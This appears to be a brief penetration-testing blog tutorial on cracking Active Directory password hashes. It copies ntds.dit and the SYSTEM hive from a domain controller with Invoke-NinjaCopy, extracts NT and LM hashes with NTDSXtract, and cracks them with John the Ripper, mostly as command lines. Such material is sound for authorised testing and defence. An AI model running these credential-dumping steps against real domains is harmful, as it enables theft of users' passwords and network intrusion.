govolution

NTDS Cracking with Kali

During a pentest it may be possible to gain access to the DC of a Windows network. The ntds.dit file is interesting because it stores all kinds of AD information, including the user password hashes.
When looking for a how-to on cracking NTDS databases I found:
https://gist.github.com/ddouhine/018ac4a8c95498101e7f
Not everything worked for me, so here are my steps:
Copy the files from the DC
I use Invoke-NinjaCopy from powersploit (https://github.com/PowerShellMafia/PowerSploit).
. .\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -path "c:\your\path\ntds\ntds.dit" -localdestination "c:\temp\ntds.dit"
Invoke-NinjaCopy -path "c:\windows\system32\config\SYSTEM" -localdestination "c:\temp\SYSTEM"
Then copy both files (ntds.dit and SYSTEM) to the Kali workstation.
Installation on Kali
wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py
wget http://pkgs.fedoraproject.org/repo/pkgs/libesedb/libesedb-alpha-20120102.tar.gz/198a30c98ca1b3cb46d10a12bef8deaf/libesedb-alpha-20120102.tar.gz
tar -zxf libesedb-alpha-20120102.tar.gz
cd libesedb-20120102/
./configure && make && sudo make install
wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
unzip ntdsxtract_v1_0.zip
Extract Hashes
/root/Downloads/ntds/libesedb-20120102/esedbtools/esedbexport ntds.dit
python /root/Downloads/ntds/NTDSXtract\ 1.0/dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 ./hashdumpwork --passwordhashes SYSTEM --lmoutfile ./lm-out.txt --ntoutfile ./nt-out.txt --pwdformat ophc > dsusers.results
(This is a single command: ntds.dit.export/ is the directory esedbexport created in the previous step, and ./hashdumpwork is the work directory argument dsusers.py expects after the two table files.)
grep -A 2 "Password hashes:" dsusers.results | grep -v "Password hashes" | grep -v 'Record ID' | grep -v "\-\-" | sort | uniq > allHashes
grep '\$NT\$' allHashes | sed 's/.\(.*\)/\1/' > NTHashes
grep -v '\$NT\$' allHashes | sed 's/.\(.*\)/\1/' > LMHashes
Cracking
john --fork=8 NTHashes
… or whatever.
More about these topics:
https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/
https://github.com/PowerShellMafia/PowerSploit
https://adsecurity.org/?p=2398
https://www.attackdebris.com/?p=92
http://ntdsxtract.com/